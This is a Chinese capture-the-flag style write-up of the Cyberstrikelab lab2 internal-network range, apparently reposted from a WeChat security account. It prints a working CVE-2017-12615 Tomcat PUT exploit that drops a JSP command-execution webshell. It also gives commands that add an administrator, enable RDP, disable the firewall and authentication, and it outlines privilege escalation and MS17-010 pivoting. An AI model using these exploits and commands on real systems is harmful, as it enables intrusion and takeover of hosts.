内网基础-Cyberstrikelab靶场lab2

admin 2025年4月9日00:45:19评论10 views字数 3473阅读11分34秒阅读模式
内网基础-Cyberstrikelab靶场lab2
内网基础-Cyberstrikelab靶场lab2
内网基础-Cyberstrikelab靶场lab2
鼎新安全
don't give up and don't give in !

内网基础-Cyberstrikelab靶场lab2

信息收集

内网基础-Cyberstrikelab靶场lab2

这里可以看到cms是骑士CMS!这个cms是存在漏洞的!我们使用fscan扫描一下!

内网基础-Cyberstrikelab靶场lab2

这里发现了192.168.10.10和192.168.10.20这两个IP!我们先从192.168.10.10开始打!这里扫描可以看到他的cms服务开启在808端口上!

内网基础-Cyberstrikelab靶场lab2参考:

后台地址: 

 /index.php?m=admin&c=index&a=login

这里的账号密码可以爆破出来!直接在bp固定username位为admin,只爆破密码即可!

拿到账号密码:admin:admin123456

漏洞利用

内网基础-Cyberstrikelab靶场lab2

我们打后台模板代码注入漏洞!

内网基础-Cyberstrikelab靶场lab2

点击 "工具-风格模板-可用模板" 即可!

内网基础-Cyberstrikelab靶场lab2

这里修改tpl_dir参数!直接写入木马即可!

Get flag1

内网基础-Cyberstrikelab靶场lab2

蚁剑连接成功!

内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2

到这里可以发现,192.168.10.10这台机器的权限很高!

内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2

这里上传v生成的木马,我们上线vshell,vshell的木马是有一定免杀能力的!

内网基础-Cyberstrikelab靶场lab2

这里我们在tomcat目录下再次上传fscan扫描一下!

内网基础-Cyberstrikelab靶场lab2

扫描完成还是之前的结果!我们先添加用户!

内网基础-Cyberstrikelab靶场lab2

添加用户  net user admin 123@abc /add  net localgroup administrators admin /add  开启RDP  REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f  关闭防火墙  netsh advfirewall set allprofiles state off  防火墙放行3389  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow  关闭身份验证  reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
然后我们直接连接即可!

内网基础-Cyberstrikelab靶场lab2

flag在10机器的c盘下!

Get flag2

刚刚我们的fscan扫描到了192.168.10.20是域控服务器,名称 :cyberstrikelab.com而且它的服务是开启在8080端口上的!192.168.10.20是台双网卡机器!内网IP我们暂时没用获取!8080端口的web服务是tomcat起的,而且存在Tomcat Put文件上传漏洞!

内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2

我们使用网上找的exp!

python#CVE-2017-12615 EXP__author__ = '纸机'import requestsimport optparseimport timeparse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')parse.add_option('-u','--url',dest='URL',help='target url')parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')options,args = parse.parse_args()#验证参数是否完整if not options.URL or not options.PORT:print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]n')exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')url = options.URL+':'+options.PORTfilename = '/backdoor.jsp'payload = filename+'?pwd=023&i='headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}#木马data = '''<%    if("023".equals(request.getParameter("pwd"))){        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = new byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){            out.println(new String(b));        }        out.print("</pre>");    }%>'''#上传木马文件def upload(url):print('[] 目标地址:'+url)  try:    respond = requests.put(url+filename+'/',headers=headers,data = data)#print(respond.status_code)if respond.status_code == 201 or respond.status_code == 204:#print('[] 目标地址:'+url)print('[+] 木马上传成功')  except Exception as e:print('[-] 上传失败')return 0#命令执行def attack(url,cmd):  try:    respond = requests.get(url+payload+cmd)if respond.status_code == 200:print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())  except Exception as e:print('[-] 命令执行错误')if upload(url) == 0:exit()time.sleep(0.5)print('输入执行命令(quit退出):')while(1):  cmd = input('>>>')if(cmd == 'quit'):break  attack(url,cmd)
这个exp就是把手动操作集合了一下!exp会给目标url上传一个名为backdoor.jsp的!利用:
http://ipxxxxxx/backdoor.jsp?pwd=023&i=whoami

内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2

我们还是老样子,把迁移到vshell上!这里我上传了一个vshell木马!

内网基础-Cyberstrikelab靶场lab2

上线成功!

内网基础-Cyberstrikelab靶场lab2

flag2在c盘下!

内网基础-Cyberstrikelab靶场lab2

这里可以看到192.168.10.20 存在内网IP 192.168.20.20,我们上传fscan扫描一下!

内网基础-Cyberstrikelab靶场lab2

发现内网机器192.168.20.30,而且这台机器存在ms17-010漏洞!这里就需要搭建代理了!可以使用vshell的,也可以上传别的代理!可以上传ew,开启正向代理,因为这里是双网卡!

内网基础-Cyberstrikelab靶场lab2

这里我们发现,我们拿到的只是一下服务权限,所以我们使用土豆提权!

内网基础-Cyberstrikelab靶场lab2

这里也是拿到192.168.10.20机器的system权限了!我们起一个cs,然后开启一个监听,直接生成power可执行的payload!这里直接填入!

内网基础-Cyberstrikelab靶场lab2内网基础-Cyberstrikelab靶场lab2

拿到了回显192.168.10.20机器!

内网基础-Cyberstrikelab靶场lab2

这里还是一样添加用户、注册表开启3389、关闭防火墙等!

内网基础-Cyberstrikelab靶场lab2

Get flag3

拿到192.168.10.20的cs后,我们直接做一个cs会话派生!把我们cs的192.168.10.20会话迁移到msf上!利于我们直接打ms17-010漏洞!

内网基础-Cyberstrikelab靶场lab2

这里拿到meterpreter后,记得添加一下内网路由!

内网基础-Cyberstrikelab靶场lab2

拿到flag3!
内网基础-Cyberstrikelab靶场lab2
END
内网基础-Cyberstrikelab靶场lab2

注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):内网基础-Cyberstrikelab靶场lab2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月9日00:45:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网基础-Cyberstrikelab靶场lab2https://cn-sec.com/archives/3910540.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息